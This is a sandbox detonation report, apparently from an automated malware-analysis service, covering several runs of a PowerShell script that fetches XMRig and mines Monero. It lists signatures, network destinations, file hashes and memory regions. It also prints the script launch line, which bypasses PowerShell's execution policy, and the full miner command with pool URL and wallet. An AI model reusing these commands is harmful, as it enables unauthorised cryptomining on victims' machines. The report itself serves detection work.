memory/4580-60-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-61-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-62-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-63-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-64-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-65-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-66-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-67-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-68-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-69-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-70-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-71-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-72-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-73-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-74-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-75-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-76-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-77-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-78-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-79-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-80-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240426-en
Max time kernel
297s
Max time network
279s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1996 wrote to memory of 1760 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1996 wrote to memory of 1760 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.138:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.138:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
Files
memory/1996-0-0x00007FFBCDF43000-0x00007FFBCDF45000-memory.dmp
memory/1996-1-0x000001C6DD770000-0x000001C6DD792000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w4cogki5.upm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1996-11-0x00007FFBCDF40000-0x00007FFBCEA01000-memory.dmp
memory/1996-12-0x00007FFBCDF40000-0x00007FFBCEA01000-memory.dmp
memory/1996-13-0x00007FFBCDF40000-0x00007FFBCEA01000-memory.dmp
memory/1996-14-0x00007FFBCDF43000-0x00007FFBCDF45000-memory.dmp
memory/1996-15-0x00007FFBCDF40000-0x00007FFBCEA01000-memory.dmp
memory/1996-17-0x00007FFBCDF40000-0x00007FFBCEA01000-memory.dmp
memory/1996-19-0x000001C6DDA40000-0x000001C6DDA4A000-memory.dmp
memory/1996-18-0x000001C6DDA50000-0x000001C6DDA62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1760-50-0x0000020371810000-0x0000020371830000-memory.dmp
memory/1760-51-0x0000020373000000-0x0000020373020000-memory.dmp
memory/1760-52-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-53-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-54-0x0000020373020000-0x0000020373040000-memory.dmp
memory/1760-55-0x0000020373040000-0x0000020373060000-memory.dmp
memory/1760-56-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1996-57-0x00007FFBCDF40000-0x00007FFBCEA01000-memory.dmp
memory/1760-58-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-59-0x0000020373020000-0x0000020373040000-memory.dmp
memory/1760-61-0x0000020373040000-0x0000020373060000-memory.dmp
memory/1760-60-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-62-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-63-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-64-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-65-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-66-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-67-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-68-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-69-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-70-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-71-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-72-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-73-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-74-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-75-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-76-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-77-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-78-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-79-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
297s
Max time network
299s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1820 wrote to memory of 2484 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1820 wrote to memory of 2484 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/1820-0-0x00007FF995073000-0x00007FF995074000-memory.dmp
memory/1820-5-0x000001AB7EB50000-0x000001AB7EB72000-memory.dmp
memory/1820-8-0x00007FF995070000-0x00007FF995A5C000-memory.dmp
memory/1820-9-0x000001AB7EEB0000-0x000001AB7EF26000-memory.dmp
memory/1820-10-0x00007FF995070000-0x00007FF995A5C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_koozvqxv.bdv.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1820-25-0x00007FF995070000-0x00007FF995A5C000-memory.dmp
memory/1820-29-0x00007FF995073000-0x00007FF995074000-memory.dmp
memory/1820-30-0x00007FF995070000-0x00007FF995A5C000-memory.dmp
memory/1820-31-0x00007FF995070000-0x00007FF995A5C000-memory.dmp
memory/1820-51-0x000001AB7EBC0000-0x000001AB7EBD2000-memory.dmp
memory/1820-64-0x000001AB666E0000-0x000001AB666EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2484-93-0x0000023B10BC0000-0x0000023B10BE0000-memory.dmp
memory/2484-94-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-95-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-96-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-97-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-98-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-99-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-100-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-101-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-102-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-103-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-104-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-105-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-106-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-107-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-108-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-109-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-110-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-111-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-112-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-113-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-114-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-115-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-116-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
299s
Max time network
273s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 900 wrote to memory of 820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 900 wrote to memory of 820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.56:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 56.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
Files
memory/900-2-0x00007FFF84D70000-0x00007FFF84E9A000-memory.dmp
memory/900-1-0x00007FFF84D70000-0x00007FFF84E9A000-memory.dmp
memory/900-0-0x00007FFF84D70000-0x00007FFF84E9A000-memory.dmp
memory/900-3-0x0000028471790000-0x00000284717B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4dwj10b0.4hr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/900-13-0x00007FFF84D70000-0x00007FFF84E9A000-memory.dmp
memory/900-15-0x0000028471A80000-0x0000028471A92000-memory.dmp
memory/900-16-0x00000284717D0000-0x00000284717DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/820-47-0x000002012AB20000-0x000002012AB40000-memory.dmp
memory/820-48-0x00007FFF84D70000-0x00007FFF84E9A000-memory.dmp
memory/820-49-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-50-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-51-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/900-52-0x00007FFF84D70000-0x00007FFF84E9A000-memory.dmp
memory/820-53-0x00007FFF84D70000-0x00007FFF84E9A000-memory.dmp
memory/820-54-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-55-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-56-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-57-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-58-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-59-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-60-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-61-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-62-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-63-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-64-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-65-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-66-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-67-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-68-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-69-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-70-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-71-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-72-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-73-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-74-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-75-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-76-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win7-20240221-en
Max time kernel
120s
Max time network
125s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
